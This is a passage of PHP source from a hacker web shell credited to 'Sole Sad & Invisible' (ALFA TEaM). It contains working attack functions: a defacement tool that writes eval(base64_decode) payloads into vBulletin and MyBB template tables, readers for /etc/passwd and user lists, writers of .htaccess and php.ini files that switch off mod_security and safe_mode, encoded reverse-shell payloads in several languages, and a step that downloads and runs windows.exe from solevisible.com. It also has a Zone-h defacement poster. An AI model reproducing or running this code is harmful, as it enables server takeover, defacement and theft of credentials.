‘td2′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘Db Name’, ‘inputName’ => ‘dbn’, ‘id’ => ‘db_name’, ‘inputValue’ => ”, ‘inputSize’ => ’50′),
‘td3′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘Db User’, ‘inputName’ => ‘dbu’, ‘id’ => ‘db_user’, ‘inputValue’ => ”, ‘inputSize’ => ’50′),
‘td4′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘Db Pass’, ‘inputName’ => ‘dbp’, ‘id’ => ‘db_pw’, ‘inputValue’ => ”, ‘inputSize’ => ’50′),
‘td5′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘Prefix’, ‘inputName’ => ‘prefix’, ‘id’ => ‘db_prefix’, ‘inputValue’ => ”, ‘inputSize’ => ’50′)
);
create_table($table);
echo “<br><div class=’txtfont’>| Your Index |</div><br>
<textarea name=’index’ rows=’19′ cols=’103′><title>Hacked By Sole Sad & Invisible</title><b>Hacked By Sole Sad & Invisible</b></textarea><br>
<input type=’submit’ value=’ ‘></form></center></center>”;
if($_POST['alfa8']==’>>’){
$s0levisible=”Powered By Solevisible”;
$dbu = $_POST['alfa2'];
$dbn = $_POST['alfa3'];
$dbp = $_POST['alfa4'];
$dbh = $_POST['alfa5'];
$index = $_POST['alfa6'];
$prefix = $_POST['alfa7'];
$index=str_replace(“\’”,”‘”,$index);
$set_index = “{\${eval(base64_decode(\’”;
$set_index .= __ZW5jb2Rlcg(“echo \”$index\”;”);
$set_index .= “\’))}}{\${exit()}}”;
if(!empty($dbh)&&!empty($dbu)&&!empty($dbn)&&!empty($index)){
$conn=@mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));
$loli1 = “UPDATE “.$prefix.”template SET template=’”.$set_index.””.$s0levisible.”‘ WHERE title=’spacer_open’”;
$loli2 = “UPDATE “.$prefix.”template SET template=’”.$set_index.””.$s0levisible.”‘ WHERE title=’FORUMHOME’”;
$loli3 = “UPDATE “.$prefix.”style SET css=’”.$set_index.””.$s0levisible.”‘, stylevars=”, csscolors=”, editorstyles=””;
@mysqli_query($conn,$loli1) or die (mysqli_error($conn));
@mysqli_query($conn,$loli2) or die (mysqli_error($conn));
@mysqli_query($conn,$loli3) or die (mysqli_error($conn));
__alert(‘VB index changed…!’);
}
}
}
if(isset($_POST['alfa2']) && ($_POST['alfa2'] == ‘mybb’)) {
echo __pre();

echo “<center><center><div class=’txtfont_header’>| Mybb |</div>
<p><center>”.getConfigHtml(‘mybb’).”<form onSubmit=\”g(‘IndexChanger’,null,’null’,’mybb’,null,null,null,this.mybbdbh.value,this.mybbdbu.value,this.mybbdbn.value,this.mybbdbp.value,this.mybbindex.value); return false;\” method=POST action=”>
“;
$table = array(‘td1′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘Mysql Host’, ‘inputName’ => ‘mybbdbh’, ‘id’ => ‘db_host’, ‘inputValue’ => ‘localhost’, ‘inputSize’ => ’50′),
‘td2′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘Db Name’, ‘inputName’ => ‘mybbdbn’, ‘id’ => ‘db_name’, ‘inputValue’ => ”, ‘inputSize’ => ’50′),
‘td3′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘Db User’, ‘inputName’ => ‘mybbdbu’, ‘id’ => ‘db_user’, ‘inputValue’ => ”, ‘inputSize’ => ’50′),
‘td4′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘Db Pass’, ‘inputName’ => ‘mybbdbp’, ‘id’ => ‘db_pw’, ‘inputValue’ => ”, ‘inputSize’ => ’50′)
);
create_table($table);
echo “<br><div class=’txtfont’>| Your Index |</div><br>
<textarea name=mybbindex rows=’19′ cols=’103′>
<title>Hacked By Sole Sad & Invisible</title><b>Hacked By Sole Sad & Invisible</b></textarea><p><input type=’submit’ value=” ></p></form></center></center>”;
if(isset($_POST['alfa6'])){
$mybb_dbh = $_POST['alfa6'];
$mybb_dbu = $_POST['alfa7'];
$mybb_dbn = $_POST['alfa8'];
$mybb_dbp = $_POST['alfa9'];
$mybb_index = $_POST['alfa10'];
if(!empty($mybb_dbh)&&!empty($mybb_dbu)&&!empty($mybb_dbn)&&!empty($mybb_index)){
$conn=@mysqli_connect($mybb_dbh,$mybb_dbu,$mybb_dbp,$mybb_dbn) or die(mysqli_error($conn));
$prefix=”mybb_”;
$loli7 = “UPDATE “.$prefix.”templates SET template=’”.$mybb_index.”‘ WHERE title=’index’”;
$result =@mysqli_query($conn,$loli7) or die (mysqli_error($conn));
__alert(‘MyBB index changed…!’);
}
}
}
echo “</div>”;
alfafooter();
}
function alfaproc()
{
alfahead();
echo “<Div class=header><br><center>”;
if(empty($_POST['ajax'])&&!empty($_POST['alfa1']))
$_SESSION[md5($_SERVER['HTTP_HOST']).’ajax’] = false;
if($GLOBALS['sys']==”win”){
$process=array(
“Task List” =>”tasklist /V”,
“System Info” =>”systeminfo”,
“Active Connections” => “netstat -an”,
“Running Services” => “net start”,
“User Accounts” => “net user”,
“Show Computers” => “net view”,
“ARP Table” => “arp -a”,
“IP Configuration” => “ipconfig /all”
);}else{
$process=array(
“Process status” => “ps aux”,
“Syslog” =>”cat /etc/syslog.conf”,
“Resolv” => “cat /etc/resolv.conf”,
“Hosts” =>”cat /etc/hosts”,
“Cpuinfo”=>”cat /proc/cpuinfo”,
“Version”=>”cat /proc/version”,
“Sbin”=>”ls -al /usr/sbin”,
“Interrupts”=>”cat /proc/interrupts”,
“lsattr”=>”lsattr -va”,
“Uptime”=>”uptime”,
“Fstab” =>”cat /etc/fstab”
);}
foreach($process as $n => $link){
echo ‘<a href=”javascript:void(0);” onclick=”g(\’proc\’,null,\”.$link.’\’)”> | ‘.$n.’ | </a>’;
}
echo “</center><br>”;
if(!empty($_POST['alfa1'])){
echo “<pre class=’ml1′ style=’margin-top:5px’ >”;
if(isset($GLOBALS["glob_chdir_false"])&&!empty($_POST["c"])){$cmd = “cd ‘”.addslashes($_POST["c"]).”‘;”;}
echo alfaEx($cmd.$_POST['alfa1']);
echo ‘</pre>’;
}
echo “</div>”;
alfafooter();
}
function alfasafe(){
alfahead();
echo “<div class=header><center><br><div class=’txtfont_header’>| Auto ByPasser |</div>”;
echo ‘<h3><a href=javascript:void(0) onclick=”g(\’safe\’,null,\’php.ini\’,null)”>| PHP.INI | </a><a href=javascript:void(0) onclick=”g(\’safe\’,null,null,\’ini\’)”>| .htaccess(apache) | </a><a href=javascript:void(0) onclick=”g(\’safe\’,null,null,null,\’pl\’)”>| .htaccess(LiteSpeed) |</a><a href=javascript:void(0) onclick=”g(\’safe\’,null,null,null,null,\’passwd\’)”>| Read-Passwd | </a><a href=javascript:void(0) onclick=”g(\’safe\’,null,null,null,null,null,\’users\’)”>| Read-Users | </a><a href=javascript:void(0) onclick=”g(\’safe\’,null,null,null,null,null,null,\’valiases\’)”>| Get-User | </a><a href=javascript:void(0) onclick=”g(\’safe\’,null,null,null,null,null,null,null,null,\’domains\’)”>| Get-Domains | </a></center></h3>’;
if(!empty($_POST['alfa8']) && isset($_POST['alfa8']) == ‘domains’){
if(!_alfa_file_exists(“/etc/virtual/domainowners”)){
echo __pre();
$solevisible9 = _alfa_file(‘/etc/named.conf’);
if(is_array($solevisible9)){
foreach($solevisible9 as $solevisible13){
if(@eregi(‘zone’,$solevisible13)){
preg_match_all(‘#zone “(.*)”#’,$solevisible13,$solevisible14);
if(strlen(trim($solevisible14[1][0])) > 2){
echo $solevisible14[1][0].’<br>’;
}}}
}
}else{
echo __pre();
$users = _alfa_file(“/etc/virtual/domainowners”);
if(is_array($users)){
foreach($users as $boz){
$dom = explode(“:”,$boz);
echo $dom[0].”\n”;}}}}
if(!empty($_POST['alfa6']) && isset($_POST['alfa6']) == ‘valiases’){
echo ‘
<form onsubmit=”g(\’safe\’,null,null,null,null,null,null,\’valiases\’,this.site.value,null,\’>>\’); return false;” method=”post” /><center><div class=”txtfont”>Url: </font><input type=”text” placeholder=”site.com” name=”site” /> <input type=”submit” value=” ” name=”go” /></form></center>’;
if(isset($_POST['alfa9']) && $_POST['alfa9'] == ‘>>’){
if(!_alfa_file_exists(“/etc/virtual/domainowners”)){
$site = trim($_POST['alfa7']);
$rep = str_replace(array(“https://”,”http://”,”www.”),””,$site);
$user = “”;
if(function_exists(“posix_getpwuid”) && function_exists(“fileowner”)){
if($user = @posix_getpwuid(@fileowner(“/etc/valiases/{$rep}”))){
$user = $user['name'];
}
}else{
if(_alfa_can_runCommand(true,true)){
$user = alfaEx(“stat -c ‘%U’ /etc/valiases/”.$rep);
}
}
if(!empty($user)&&$user!=’root’){
echo __pre().”<center><table border=’1′><tr><td><b><font color=\”#FFFFFF\”>User: </b></font></td><td><b><font color=\”#FF0000\”>{$user}</font></b></td></tr><tr><td><b><font color=\”#FFFFFF\”>site: </b></font></td><td><b><font color=\”#FF0000\”>{$rep}</font></b></td></tr></table></center>”;
}else {echo __pre().’<center><b>No such file or directory Or Disable Functions is not NONE…</b></center>’;}
}else{
$site = trim($_POST['alfa7']);
$rep = str_replace(array(“https://”,”http://”,”www.”),””,$site);
$users = _alfa_file(“/etc/virtual/domainowners”);
foreach($users as $boz){
$ex = explode(“:”,$boz);
if($ex[0] == $rep){
echo __pre().”<center><table border=’1′>
<tr><td><b><font color=\”#FFFFFF\”>User: </b></font></td><td><b><font color=\”#FF0000\”>”.trim($ex[1]).”</font></b></td></tr>
<tr><td><b><font color=\”#FFFFFF\”>site: </b></font></td><td><b><font color=\”#FF0000\”>{$rep}</font></b></td></tr></table></center>”;break;}}}}}
if(!empty($_POST['alfa5']) && isset($_POST['alfa5'])){
if(!_alfa_file_exists(“/etc/virtual/domainowners”)){
echo __pre();
$i = 0;
while ($i < 60000) {
$line = @posix_getpwuid($i);
if (!empty($line)) {
while (list ($key, $vl) = each($line)){
echo $vl.”\n”;
break;}}$i++;}
}else{echo __pre();
$users = _alfa_file(“/etc/virtual/domainowners”);
foreach($users as $boz){
$user = explode(“:”,$boz);
echo trim($user[1]).’<br>’;}}}
if(!empty($_POST['alfa4']) && isset($_POST['alfa4'])){
echo __pre();
if(_alfa_can_runCommand(true,true)){echo __read_file(“/etc/passwd”);}elseif(function_exists(“posix_getpwuid”)){
for($uid=0;$uid<60000;$uid++){
$ara = @posix_getpwuid($uid);
if(!empty($ara)){
while(list ($key, $val) = each($ara)){
echo “$val:”;
}echo “\n”;}}
}else{__alert(‘failed…’);}}
if(!empty($_POST['alfa2']) && isset($_POST['alfa2'])){
@__write_file($GLOBALS['cwd'].”.htaccess”,”#Generated By Sole Sad and Invisible\n<IfModule mod_security.c>\nSec——Engine Off\nSec——ScanPOST Off\n</IfModule>”);
echo ‘<center><b><big>htaccess for Apache created…!</center></b></big>’;
}
if(!empty($_POST['alfa1'])&& isset($_POST['alfa1'])){
@__write_file($GLOBALS['cwd'].”php.ini”,”safe_mode=OFF\ndisable_functions=ByPassed By Sole Sad & Invisible(ALFA TEaM)”);
echo ‘<center><b><big> php.ini created…!</center></b></big>’;
}
if(!empty($_POST['alfa3']) && isset($_POST['alfa3'])){
@__write_file($GLOBALS['cwd'].”.htaccess”,”#Generated By Sole Sad and Invisible\n<Files *.php>\nForceType application/x-httpd-php4\n</Files>\n<IfModule mod_security.c>\nSecFilterEngine Off\nSecFilterScanPOST Off\n</IfModule>”);
echo ‘<center><b><big>htaccess for Litespeed created…!</center></b></big>’;
}
echo “<br></div>”;
alfafooter();
}
function __get_resource($content){
return @gzinflate(__ZGVjb2Rlcg($content));
}
function __write_file($file, $content){
if($fh = @fopen($file, “wb”)){
if(fwrite($fh, $content)!==false) return true;
}
return false;
}
function bcinit($evalType, $evalCode, $evalOptions, $evalArguments){
$res = “<font color=’green’>[ Success...! ]</font>”;
$err = “<font color=’red’>[ Failed...! ]</font>”;
if($evalOptions!=””) $evalOptions = $evalOptions.” “;
if($evalArguments!=””) $evalArguments = ” “.$evalArguments;
if($evalType==”c”){
$tmpdir = ALFA_TEMPDIR;
chdir($tmpdir);
if(is_writable($tmpdir)){
$uniq = substr(md5(time()),0,8);
$filename = $evalType.$uniq.”.c”;
$path = $filename;
if(__write_file($path, $evalCode)){
$ext = ($GLOBALS['sys']==’win’)? “.exe”:”.out”;
$pathres = $filename.$ext;
$evalOptions = “-o “.$pathres.” “.$evalOptions;
$cmd = “gcc “.$evalOptions.$path;
alfaEx($cmd);
if(is_file($pathres)){
if(chmod($pathres, 0755)){
$cmd = $pathres.$evalArguments;
alfaEx($cmd);
}else{$res = $err;}
unlink($pathres);
}else{$res = $err;}
unlink($path);
}else{$res = $err;}
}
return $res;
}elseif($evalType==”java”){
$tmpdir = ALFA_TEMPDIR;
chdir($tmpdir);
if(is_writable($tmpdir)){
if(preg_match(“/class\ ([^{]+){/i”,$evalCode, $r)){
$classname = trim($r[1]);
$filename = $classname;
}else{
$uniq = substr(md5(time()),0,8);
$filename = $evalType.$uniq;
$evalCode = “class “.$filename.” { “.$evalCode . ” } “;
}
$path = $filename.”.java”;
if(__write_file($path, $evalCode)){
$cmd = “javac “.$evalOptions.$path;
alfaEx($cmd);
$pathres = $filename.”.class”;
if(is_file($pathres)){
if(chmod($pathres, 0755)){
$cmd = “java “.$filename.$evalArguments;
alfaEx($cmd);
}else{$res = $err;}
unlink($pathres);
}else{$res = $err;}
unlink($path);
}else{$res = $err;}
}
return $res;
}
return false;
}
function alfaconnect(){
alfahead();
$php=”7VZta9swEP5e6H9QjaE2S5uXfhg0pDBYPw7KVtiHtjOOLNcitqVJ8pKxpb99d36L4zid17WwQV1wrbvTo0e6Oz1hSgnlKSaFMjy9d0bu9PBAM+MZnjAv5gk3hU3MPZ7ImFNuvDDOdOSg1Ta+umdGkxlhKxmLgDkWsQaktOchFL3js7O3OFj6MEizOMYBaw50BAMLUIAJub78+GG2Mkwl06tP49nxrX31+f3F8bR0g206nPN0CJNOuIXTE5z9QN7FoU+umZ8QHbE4Jg/k8AD9PCQOFVlqnIqyS2ZAyyU/Dg8IPLYEgNI3LU05I6saGRzBogFa1oTFmu1BnXSi6pvRXRO5No/vtpfw6SJfomAdZik1XKQeW3FttHMsaWpiLxRqcew2FuIBTN748vSgBzEK74yc4IYBxzjjtru0j5p2KTRfeVANmgeO2wFQUkTe1dlsGGHatVGQC08LuoCa0kx9Y8qxDJXnw+HoNP87t8gp0IeaYUqlovgP8yoiFURZkyKDw9YDclYztenOQj6lTGJcczcQYkQslsBAZ3MYOTKSXpb6CXPcARkBpptv0lrydLMPfMKl4oY5NgV2CdCFtNElHskpsS6sahF8lhGPGZ4oOQKk0Ici2UKqiyLE1ANic3J97orde4lvaORYQxrcEufmy62+e+MOOfYWnpVS7g5ujh1gGYB7U1VtdK69gCsHIgGCRtV3R7QtAGt7r62oTRsYxZPmEduyPEysFov8/En2RnzNIMIlc8jgooWP6AUNHxr7coWTkIi1k4TWxGbGRHNv60ZWaSw0a+WgMtalU2xxbzU059oB1ryvlP/dGZHZRflpSS4ZJM5SFtTZuMOxRMek27G1gFTY5EpQT0iWAstogKtiUXDZjMSUHEGmFdMiUxTYSqyY7d7Hp9Fe8xi6B0UAweCygp7oFTnuHTnpFUlbQWVPGZXt9lJ+QzIRYhaxyIrvgpXbXVO28uss5Tms9lBSbHdCzTFmFO4U5UPkEl8MXqheXS3MU6+xgvL3dCvHmwDggyKO6q42rOqtyorN21HrxwjU2+vDog5+nAp9EovJn7CY/D2Ljl7XXb3eeQEUp73PM97r2S6gvFcrb61p6+YPiEo9Ufa31TNEOSsaPSrvfZbia0v/nknb9LNr207uXrWtib9P2+AHa1910z3UrYeQ6VchexEh008SMv0kIdMvLmS65+Wt/ych0/+EkP2ORV8he2nN+gU=”;
$python=”pVRtT9swEP6cSv0PxptWR80M7YY0wYJUQZjQBlRtp30AVqXOpYmWOpHtQPnCb5/tJG1AHUKaqra+V99z95zf7e2XUuwvUr4P/B4VjyrJebeTropcKCTAk+WiEDkDKb1cevJRf3P2B5Sn0hV0O4WPcbeT2N8IYiQTyDLC3KNuxzFx/jaejvMCOGGe9fFnotTZVZSX6pnTxTgwahBilzrlL7WuvkmAKgVHRk2rlFRAGBG336h0upZqVSjiUuAsj4D0ShV//NLTeSoIIVNpzmsMaYxySXm4gj0fc4WNzol9RuM0A54Tc7ujPXRjFKwIhrVt3CyYXPprBWJ1PJ4O/N778a+zk95xbdWqY9tymaCPKfr6AfelEiR2+xidtIXhVjIXQSbBFvCQ6NuR6aAVHSUeq4MjdGkC2D0ZHAw/uzQCCxFbiNgW68CaQaFq/yKUstI2uR2DWWMjwj05qDXOwhdAJYSCJQSz6BaRm9+38q7vYk94cRYupXG4+HZ1PQlOR9PAreN0qkWTo+5lEaqEpjJKBVnQpcjLggxcd+NkmsmSF9bGqEcJPCL/mmDj18Ki8xl+WVYKt11JqVDII4tUnw3WOruRKkebB9XkOg+11HCkqeBoSz58y3FfF78ExR4Mz/CJ3omlr5lBQ7G810tV9XXp+v7Q7oe/vBncdTuQtSyf2hYn0YehddGVwDpVuhtm6VKuSKFP0q+2kVZ/pJZG5/OLq2BWryqdXp9+n09nk2B0aWI0TGUsebEJmF7/mBuvdsx8EvycBqOzs4lnLn1ZvaSawREh+IDaD/YKOwBJs1TvAieHRjLM1Csfur7uAjPEsyvT4qB5R6jMAAqLbTu8navXUIDgJzTK4hDNIFyhqZkvetIT2M2JLSFeC8ebp2F3ls3D8KwZdmAGJtLEzTkHpghJ6mbsxnn4Bpzy/3C+Fv5GnNL9Cw==”;
$perl=”lZLRjpNAFIav26TvMOJsC8kYWr1bpJFQ3DRrS8OwGmOVsPSsTKQDgVm3m+722Z0BVifGGL0755/Dd+Abnj+zb5vavmbcBv4dVVAXo+FtA2gZnp/TMvsGwhkNcdm4+EuoqiZ3DThUZS1QHEQr9yCg3jsbOnMnW7z5sNjOJ05/LkOnJTc5esEM+TS7MRXqtLfvZMysY4s788MV3QT+GbIvDedRLhHuVxBVXYry+p6nezAnIqsmliQ07SuZlIw3b5PlOojJmIb+ZULjKPBWBAvr4WHHwLS6bW+86OK9686s42g4wJWLVf9p+lmeDhoQilZWCkfDd4kCSSANkyi4ooG3WERkpkAD+RE7OaTG092uThg3cUWWazWSeOuPlrZ1ULBGAJfjr/Q0zTKQm3xCrW65JPrEOCGvuElRDOke0RyKAp223CDTdqisgCMaL5ZrYrwe+4bzFIRXMTHmehJEUZ/I5+AAGZJqtfVZUTZg+pbTFfRnoehaI8laJ6lWB2QCTWUlLweK5pfYl38Si/O+nXUtcxkHkaSilNpyXQpO3d+cYqafZyXnkKn7wamet/boP9gze3vzMTUs5ynp9elR709FfxP4f946W3BU+kz5Jz3+AA==”;
$ruby=”tVb7b9M6FP7Z+SuMN0hzVxLGQ+h2N6vGU0ggqjG4QmQXtc5pYy11gu3QoW387fiVrqXt1ivd66p1es7n8/T52p07SSNFMmI8Af4di2b0I9jBhVK17CXJhKmiGcW0miajR08fn7nPQMC3hgnAoazoGajwWlAPVcGHUwiDIIcxlg09kwESoBrB8fHHZ5+/Dt4enbx6f/wuzqsZp0MJ8XSoaNEJp3LG+KV5TxmfzMKor0QDvfGwlBAAz51FAcPSOOlIJSJtOdV7gNgYv2IlxHDOpJJ9r9TagY8n5jCz0rg1EKvqqw7NGDbHbaRYFcCxSEU8kc2ok2RJ0iVZRiJsYT4N4aLRh46OX3+KS+ATVaTpfoD1MqIvD07Tn8k/Xx7c//P0Yr/75Go36dfpG65gAqLjEVFPB6vsGZmePB98APEdhI2TkG4dWQ1NZTykFGoHpHEtGFeY2DZgWUBZ4h6mFedAFeQZJxY3ggnj9sksHSivlO8FXljjlJoqsCUhnAPF0voZdwic15VQ+OTl8bv0XIGYHgw+7Kdhtjv4+0V2GB54vRYe2DskC3yf4eyv7N7dHGeHdnvodtIdm1c09wamsYuu2/TmPSYxifbIIVlCzQrdaVzq2CeglhMySwyZBAxCVOKZqEzypWlGziAT/d1kBe+rU8a0qKZ1mhKyAvEwY4fmOP4jYWshZpVp6e+ORiasG4aRM7zxRHt1cz0/VFXiR79TRhvRzse8QLcgXzChvWvLNwHNZd6k264jCw31ZcpmvRvLtC5pV6etE7oN/p+mBRtNvXkf11UNvFN2iSDRxSWrLlvzrDJsk+8RPZd7K76ugm3D/l22+L19FiBpc33vNfnN6QW4bMR1BjKmZbWQkUw5K4PWluvhErE9tAS5gdi0o1VqO9DSIrXf9k81x5oC+oAc4TrGsz8ejvF2Loory3pIbsFxyBEcQkvUhhAaa760jIaMu/+byFCb2Tzo1QullS1hSUdYWoJuISkbP1rDTMjLF6nIytBm4kHtoTU0g9rDi4zihUvk4US2d3bdmLCty29MsDmKdpBX3S5r/o1z8Mh10ym3nM4lp353m/8zsHbgkJ82E6WbM/1kJwz58XKTZ8FG8gs=”;
$node=”nVHLasMwEDwrkH8QvliCoEDTW8ih9BPSW/pAtdeRQJZcSXYKIfn2yrKd5tGWYh+Ed2d2NDtquMWu4juNV9jCRy0tkDQTUuVvlTUZOJdSFgnL6aQJZA3+nBrKlPaQ8xZ4eY52nRMhM9oZBRdXda1I6VUEKBUo6fxd6rkTaUBkQXo3rFLcF8aWrOQ+E2T+ugssSen3XFbmDD4hPSlyu20CMCi0ZafZ/jEFeuvFarWg++kEtXwRyGEvlgXzHtZgG7CkqHXmpdHERR5ybGelB5Ic8YMqOH5qV19HD8dnnbT74P7rtgqiMUcSjZ7jTjDnc6mZBVeXQOg1ZGrPws1Jzj1PZoMTTNqa7gcnsVoebpXB2pHjf40Npm+mUXcKpqTzoGPKm7uXtnmYTkA5wNfZ35+ydxfZPxqtoYu9V5nF19wsotx/HgH9lj76IXY0Mm80Mmg0LuHDFw==”;
$c=”tVJtb9owEP7cSv0PHp1ap/WAsO0TTaWoZBLaChHJNE0bilLHNKcZG8Vmgk7rb98lBArZi/alUqzcPff47nzPnYLicpkJcmVsBrqdX58cn+5hBaj738BMwl0TXJuOXS+E+QNuNP8mbCOghAU8HVCNwFIBVqhAUJbMU1C0NNLinjOepwW5QPP7l6nz4+T4qIwYxpn23D662PCSI4IV0ywrElAEShxmtLzveb3q1hG0Dahkls5Brj3/XTIcBXH/KbDQhfVyq5WhqdVAq4Lu1HH2OGX+tql+FVXS4cgfDCaJP/q84Rlv83JaF2DR+OZ9EsWTwL9l3ZojbEnSC0sNxj8kJaeiJpPgYxSUGdmZZgYehJ5RvW1hRl8YR6zA0jrRHagMU9DGBMiFcwasu3JrmsThCoXEtxufeynnoqrefeoJU3HWeiS+nKUkFumcRLmQkjx+VS3We7MlZstFD4mHnnvg9eqUayw7py2xKkdL4mBy662sKOb9MHK985fhp8H1eb+OIoSm4KSDj+qYnLyCVt2t1EZQXjk/8QhpBNlp+/pZtC23tLI2zN60nveDKPQWYjh1iWPdMi7dy31kl/2fGzEMw8k4HifxTbgTmXKtlOD2r8rWe9GIOY5z1T1Yj0pT87+amobnHnjPoanZaorfLw==”;
$java=”lVRNb9swDD2nQP+D4JM9BG6T04bCwz6ww4ABHZbeuhwUhbG12rIg0XGCNPvtoz7sumsvPdiWyCfy8ZGybHRrkP3he57LNn93c3khJyYF6G2XF7rb1FIwUXNrGa93/A54c7q8mGkj9xyBWeRIgJ1UvI4wjQwOCGpr2V1lgG8dfjzwXekOV0j2hkl7M3Xddvjkazv0DMgdOGhMn5+dvziQnbCSNpe2oMh+ScbCRTqHUJ9u92CM3MIk7r6VW2Y6lWae5wzNMSxmmyPC/ZptWMEU9Mxv3y8+LNc3wS8VMkFOyuPKTDdZdPSVrCEVH4vrjMVYM2KR90YipJv59VwMUG/f1Z2t0tH0asyz/4S34Ciq9NtBgEbZKgbZCXJSUZEWXDzcGS6Awnmwe4XqY72xY77shkuVkn5SlVQoN6UNIrjK3Dj43MHPRLMlXsnVRqorWyXeJXfp6mgRmrwE/GlaDQaPadLaXPEGkizH9kfbg/nKLRHKpdrC4XaXJr1USebkOcWo9EkC35itd9a/7DONHHMzx1YV1DX7+1uFzJPe9C75F9rbKOGqFQ+ArIp9C9voG7tL1F29eQ2qxKooFrH9M38NCppThBJMrrmxQBuPvr9eD/1YgaFZiqnskGpiTF2gAe242JwL17Gh0aGXUFtg/5NZvpVMEE1qwnrXYj1JPBFB6jmb8Dq/LgV7fGSv85newFK6siun/sQ8jvGzy1m2I3ZqH8HkH27HYKJxEuB+J3TwV6dQNuCOxyVNExxApDQ4WfxPkFo0tYtYMOmsX1CbOyJDAodePqFL90fRLxmO8EVOV8e49unluHyS0b/ecDPpOf8D”;
echo “<div class=header><center><br><div class=’txtfont_header’>| Back Connect |</div><br><br>”;
echo “<form onSubmit=\”g(‘connect’,null,this.selectCb.value,this.server.value,this.port.value,this.cbmethod.value);return false;\”>
<div class=\”txtfont\”>Mehtod:</div> <select name=’cbmethod’ onChange=’ctlbc(this);’ style=’width:120px;’><option value=’back’>Reverse Shell</option><option value=’bind’>Bind Port</option></select> <div class=\”txtfont\”>Use:</div> <select name=’selectCb’>”;
$cbArr = array(“php”=>”Php”,”perl”=>”Perl”,”python”=>”Python”,”ruby”=>”Ruby”,”c”=>”C”,”java”=>”Java”,”node”=>”NodeJs”,”bcwin”=>”Windows”);
foreach($cbArr as $key=>$val){echo(“<option value=’{$key}’ “.($GLOBALS['sys']==’win’?’selected’:”).”>{$val}</option>”);}
echo “</select> <div id=’bcipAction’ style=’display:inline-block;’><div class=\”txtfont\”>IP:</div> <input type=’text’ style=’text-align:center;’ name=’server’ value=’”. $_SERVER['REMOTE_ADDR'] .”‘></div> <div class=\”txtfont\”>Port: </div> <input type=’text’ size=’5′ style=’text-align:center;’ name=’port’ value=’2012′> <input type=’submit’ value=’ ‘></form><p><div id=’bcStatus’><small>Run ` <font color=’red’>nc -l -v -p port</font> ` on your computer and press ` <font color=’red’>>></font> ` button</small></div></p></center></b></font><br>”;
if(isset($_POST['alfa1'])&&!empty($_POST['alfa1'])){
$lang = $_POST['alfa1'];
$ip = $_POST['alfa2'];
$port = $_POST['alfa3'];
$arg = ($_POST['alfa4']==’bind’?$port:$port.’ ‘.$ip);
$tmpdir = ALFA_TEMPDIR;
$name = $tmpdir.’/’.$lang.uniqid().rand(1,99999);
$allow = array(‘perl’,’ruby’,’python’,’node’);
eval(‘$lan=$’.$lang.’;’);
if(in_array($lang,$allow)){
if(__write_file($name,__get_resource($lan))){
if(_alfa_can_runCommand(true,true)){
$os = ($GLOBALS['sys']!=’win’)?’1>/dev/null 2>&1 &’:”;
$out = alfaEx(“$lang $name $arg $os”);
if($out==”){$out=”<font color=’green’><center>[ Finished...! ]</center></font>”;}
echo(“<pre class=’ml1′ style=’margin-top:5px’>{$out}</pre>”);
}
}else{
echo(“<pre class=ml1 style=’margin-top:5px’><font color=’red’><center>[ Failed...! ]</center></font></pre>”);
}
}
if($lang==’java’||$lang==’c’){
$code = __get_resource($lan);
$out = nl2br(bcinit($lang, $code,”,”));
echo(“<pre class=ml1 style=’margin-top:5px’><center>{$out}</center></pre>”);
}
if($lang==’bcwin’){
$alfa = new AlfaCURL();
$s = $alfa->Send(‘http://solevisible.com/bc/windows.exe’);
$tmpdir = ALFA_TEMPDIR;
$f = @fopen($tmpdir.’/bcwin.exe’,’w+’);
@fwrite($f, $s);
@fclose($f);
$out = alfaEx($tmpdir.”/bcwin.exe “.$_POST['alfa2'].” “.$_POST['alfa3']);
}
if($lang==’php’){
echo “<pre class=ml1 style=’margin-top:5px’>”;
$code = __get_resource($lan);
if($code!==false){
$code = “\$target = \””.$arg.”\”;\n”.$code;
eval($code);
echo(“<center><font color=’green’>[ Finished...! ]</font></center>”);
}
echo “</pre>”;
}
}
echo “</div>”;
alfafooter();
}
function alfazoneh(){
alfahead();
echo ‘<div class=header>’;
if(!function_exists(‘curl_version’)){
echo “<pre class=ml1 style=’margin-top:5px’><center><font color=red><b><big><big>PHP CURL NOT EXIST ~ ZONE H MASS POSTER DOES NOT WORK</b></font></big></big></center></pre>”;
}
$hackmode = array(‘known vulnerability (i.e. unpatched system)’,’undisclosed (new) vulnerability’,’configuration / admin. mistake’,’brute force attack’,’social engineering’,’Web Server intrusion’,’Web Server external module intrusion’,’Mail Server intrusion’,’FTP Server intrusion’,’SSH Server intrusion’,’Telnet Server intrusion’,’RPC Server intrusion’,’Shares misconfiguration’,’Other Server intrusion’,’SQL Injection’,’URL Poisoning’,’File Inclusion’,’Other Web Application bug’,’Remote administrative panel access bruteforcing’,’Remote administrative panel access password guessing’,’Remote administrative panel access social engineering’,’Attack against administrator(password stealing/sniffing)’,’Access credentials through Man In the Middle attack’,’Remote service password guessing’,’Remote service password bruteforce’,’Rerouting after attacking the Firewall’,’Rerouting after attacking the Router’,’DNS attack through social engineering’,’DNS attack through cache poisoning’,’Not available’,’Cross-Site Scripting’);
$reason = array(‘Heh…just for fun!’,’Revenge against that website’,’Political reasons’,’As a challenge’,’I just want to be the best defacer’,’Patriotism’,’Not available’);
echo ‘
<center><br><div class=”txtfont_header”>| Zone-h Mass Poster |</div><center><br>
<form action=”” method=”post” onsubmit=”g(\’zoneh\’,null,this.defacer.value,this.hackmode.value,this.reason.value,this.domain.value,\’>>\’); return false;”>
<input type=”text” name=”defacer” size=”67″ id=”text” placeholder=”ALFA TEaM 2012″ />
<br>
<select id=”text” name=”hackmode” style=”width:400px;”>’;
$x=1;
foreach($hackmode as $mode){echo(‘<option style=”background-color: rgb(F, F, F);” value=”‘.$x.’”>’.$mode.’</option>’);$x++;}
echo ‘</select><br><select id=”text” name=”reason” style=”width:200px;”>’;
$x=1;
foreach($reason as $mode){echo(‘<option style=”background-color: rgb(F, F, F);” value=”‘.$x.’”>’.$mode.’</option>’);$x++;}
echo ‘</select><br>
